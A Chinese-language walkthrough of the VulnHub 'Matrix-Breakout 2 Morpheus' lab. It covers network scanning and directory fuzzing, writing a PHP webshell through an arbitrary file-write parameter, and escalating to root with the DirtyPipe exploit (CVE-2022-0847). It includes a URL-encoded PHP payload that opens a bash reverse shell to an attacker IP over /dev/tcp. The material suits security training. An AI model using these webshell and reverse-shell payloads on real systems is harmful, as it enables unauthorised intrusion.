vulnhub靶场之Matrix-Breakout 2 Morpheus

一.环境搭建

1.靶场描述

This is the second in the Matrix-Breakout series, subtitled Morpheus:1. It’s themed as a throwback to the first Matrix movie. You play Trinity, trying to investigate a computer on the Nebuchadnezzar that Cypher has locked everyone else out from, which holds the key to a mystery.
Difficulty: Medium-Hard 
 
  

2.靶场地址

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
 
  

3.启动靶场

vulnhub靶场之Matrix-Breakout 2 Morpheus_第1张图片

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.52.0/24
 
  
arp-scan -l
 
  

靶场真实ip地址为192.168.52.135

(2)探测端口及服务

nmap -p- -sV 192.168.52.135
 
  
发现开启了80端口,APache httpd 2.4.51((Debian))
发现开启了22端口,OpenSSH 8.4p1 Debian 5 (protocol 2.0)
发现开启了81端口,nginx 1.18.0

也可以使用masscan进行探测

masscan --rate=10000 --ports 0-65535 192.168.52.135
 
  

(3)web指纹识别

whatweb -v 192.168.52.135
 
  

3.渗透测试

(1)访问web服务

http://192.168.52.135
 
  
http://192.168.52.135:81
 
  

访问81端口,发现需要账号密码,尝试了一下弱口令,未能成功登录。

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.52.135
 
  

没有有用的信息

2)nikto扫描网站结构
nikto -h http://192.168.52.135
 
  
3)dirsearch目录扫描
dirsearch -u 192.168.52.135 -e * -x 403 --random-agent
 
  

扫描到一个robots.txt

vulnhub靶场之Matrix-Breakout 2 Morpheus_第2张图片

没有任何信息

截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行

还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,我们使用另外两个字典进行扫描
 
  
ffuf -u http://192.168.52.135/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
 
  

vulnhub靶场之Matrix-Breakout 2 Morpheus_第3张图片

gobuster dir -u http://192.168.52.135 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
 
  
graffiti.txt
graffiti.php
 
  

接下来我们访问这两个php,txt文件

(3)渗透测试

1)访问graffiti.php页面

我们可以看到有一个输入框,我们输入MS02423,看到返回页面显示了MS02423

vulnhub靶场之Matrix-Breakout 2 Morpheus_第4张图片

vulnhub靶场之Matrix-Breakout 2 Morpheus_第5张图片

2)访问graffiti.txt页面

我们可以看到返回页面和graffiti.php页面是一样的

vulnhub靶场之Matrix-Breakout 2 Morpheus_第6张图片

然后我们进行抓包看看,我们可以看到变量名是file

vulnhub靶场之Matrix-Breakout 2 Morpheus_第7张图片

此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell

3)抓包写入一句话木马

在burp里面空格要使用+号代替

message=&file=MS02423.php
 
  
在写入一句话木马的时候,大家一定要把火绒关闭,不然的话会把杀掉
 
  

蚁剑连接成功,我们可以看到一些文件,但是都没有什么用

vulnhub靶场之Matrix-Breakout 2 Morpheus_第8张图片

我们进入虚拟终端看看有没有什么东西,最后发现了一个flag 1

vulnhub靶场之Matrix-Breakout 2 Morpheus_第9张图片

我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。

vulnhub靶场之Matrix-Breakout 2 Morpheus_第10张图片
4)反弹webshell

蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)

& /dev/tcp/192.168.52.152/666 0>&1'"); ?>
 
  

编码之后,访问文件即可即可反弹shell

%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.52.152%2F666+0%3E%261%27%22%29%3B+%3F%3E  
 
  

浏览器访问即可

http://192.168.52.152/3.php
 
  

我们使用ls -la 可以看到隐藏图片,我们进行下载到kali

vulnhub靶场之Matrix-Breakout 2 Morpheus_第11张图片

5)分析图片

我们访问图片

http://192.168.52.135/.cypher-neo.png
 
  

问题就是它了,网站上看不出来问题下载下看看,这里用到了一下图片隐写的知识

wget http://192.168.52.135/.cypher-neo.png
binwalk .cypher-neo.png
 
  

!!!!捆绑好家伙行

binwalk -e .cypher-neo.png --run-as=root
 
  

研究了半天都没有研究出来什么东西,我们直接进行提权看看

vulnhub靶场之Matrix-Breakout 2 Morpheus_第12张图片
vulnhub靶场之Matrix-Breakout 2 Morpheus_第13张图片
6)进行提权

查看一下当前linux的内核版本

uname -a
 
  

系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847

https://github.com/r1is/CVE-2022-0847
 
  

下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接到靶机里),给权限直接跑

vulnhub靶场之Matrix-Breakout 2 Morpheus_第14张图片

蚁剑里面有bug,我们反弹shell,在kali里面进行

vulnhub靶场之Matrix-Breakout 2 Morpheus_第15张图片

vulnhub靶场之Matrix-Breakout 2 Morpheus_第16张图片

我们可以看到提权已经是root了,我们直接查看flag即可

vulnhub靶场之Matrix-Breakout 2 Morpheus_第17张图片

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.burp工具的使用

10.kali反弹shell

11.蚁剑的使用

12.gobuster.ffuf

13.binwalk工具的使用

你可能感兴趣的:([,vulnhub靶机通关篇,],web安全)